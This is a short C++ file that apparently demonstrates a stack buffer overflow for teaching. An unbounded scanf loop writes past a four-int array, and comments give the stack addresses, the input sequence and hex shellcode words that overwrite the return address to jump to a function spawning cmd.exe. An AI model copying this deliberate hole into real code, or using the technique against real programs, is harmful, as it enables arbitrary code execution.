#include <iostream>

using namespace std;

void evilCode() {
  char str[] = "cmd.exe";
  system(str);
}
int i;
int exploitMe() {
	// buf is at 0x0012ff28
	// exploit starts 12ff34
	// 6th number you enter clobbers return address
	// to hack:
	/*
1
2
3
4
5
12ff34
83ec8b55
565348ec
b87d8d57
000012b9
ccccb800
abf3cccc
47101ca1
f8458900
10200d8b
4d890047
f8558dfc
0baae852
c483002f
5b5e5f04
3b48c483
f65ee8ec
e58b0001
0
*/

	int buf[4];
	int n = -1;
	int j;
	printf("buf is at %x\n", &buf);
	buf[0] = 0xAA; buf[1] = 0xBB; buf[2] = 0xCC; buf[3] = 0x00;
	while (n != 0) {
		scanf("%x", &n);
		buf[i++] = n;
	}

	printf("you entered ");
	for (j=0; j<i; j++)
		printf("%x ", buf[j]);
	getchar();
	getchar();
	return 0;
}

int main() {
  cout << "evilCode() is at " << &evilCode << endl;
  exploitMe();
  return 0;
}

/********

  stack:
12ff30: ret (saved value is 0x00401687 or 0x00401682)
12ff2c: ebp (saved value is 0x12ff80)
12fedc: [50h]
12fed8: ebx
12fed4: esi
12fed0: edi



esp before sub: 12ff2c
esp after  sub: 12fedc
buf:        0x0012ff1c
buf[5]:     0x0012ff30  <---- matches location of saved return address!


*(int *)0x12ff30=0x401580 returns to evilcode


  *******/